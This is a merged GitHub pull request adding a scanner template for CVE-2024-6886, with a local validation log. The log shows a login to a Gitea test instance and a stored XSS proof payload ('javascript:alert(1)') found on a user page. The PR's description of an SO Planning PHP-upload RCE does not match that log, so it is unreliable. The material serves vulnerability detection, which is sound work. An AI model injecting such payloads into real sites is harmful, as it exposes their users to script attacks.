Create CVE-2024-6886 #11534

Merged
merged 2 commits into from
Jan 30, 2025

soonghee2
Contributor

Template / PR Information

Added CVE-2024-6886

An authenticated Remote Code Execution (RCE) vulnerability is found in the SO Planning online planning tool. If the public view setting is enabled, an attacker can upload a PHP-file that will be available for execution for a few milliseconds before it is removed, leading to execution of code on the underlying system. The vulnerability has been remediated in version 1.52.02.

Template Validation

I've validated this template locally?

  • YES
  • NO
POST /user/login HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Connection: close
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

user_name=user3&password=user3user3
[VER] [CVE-2024-6886] Sent HTTP request to http://localhost:3000/user/login
[DBG] [CVE-2024-6886] Dumped HTTP response http://localhost:3000/user/login

HTTP/1.1 303 See Other
Connection: close
Content-Length: 0
Cache-Control: max-age=0, private, must-revalidate, no-transform
Date: Sat, 25 Jan 2025 13:25:51 GMT
Location: /
Set-Cookie: i_like_gitea=25d77704be04d6ab; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: _csrf=GBSnYj265488F9fTPLfq7aUOzFs6MTczNzgxMTU1MTg4MjExMzI2OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
Set-Cookie: i_like_gitea=4d74d1b154f6011b; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: lang=en-US; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: _csrf=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN

[INF] [CVE-2024-6886] Dumped HTTP request for http://localhost:3000/

GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Cookie: i_like_gitea=4d74d1b154f6011b; lang=en-US
Accept-Encoding: gzip

[VER] [CVE-2024-6886] Sent HTTP request to http://localhost:3000/
[DBG] [CVE-2024-6886] Dumped HTTP response http://localhost:3000/


HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: max-age=0, private, must-revalidate, no-transform
Content-Type: text/html; charset=utf-8
Date: Sat, 25 Jan 2025 13:25:52 GMT
X-Frame-Options: SAMEORIGIN
...
...
....
				
					<div class="flex-item-body"><a href="javascript:alert(1)">XSS test2s7fQJk7ykXnuNjD9S0a5B6bmAj</a></div>
				
			

[CVE-2024-6886:word-1] [http] [high] http://localhost:3000/user3

@GeorginaReeder

Thanks for your contribution @soonghee2 ! :)

@ritikchaddha ritikchaddha self-assigned this Jan 30, 2025
@ritikchaddha ritikchaddha added the Done Ready to merge label Jan 30, 2025
@DhiyaneshGeek DhiyaneshGeek merged commit b05b572 into projectdiscovery:main Jan 30, 2025
3 checks passed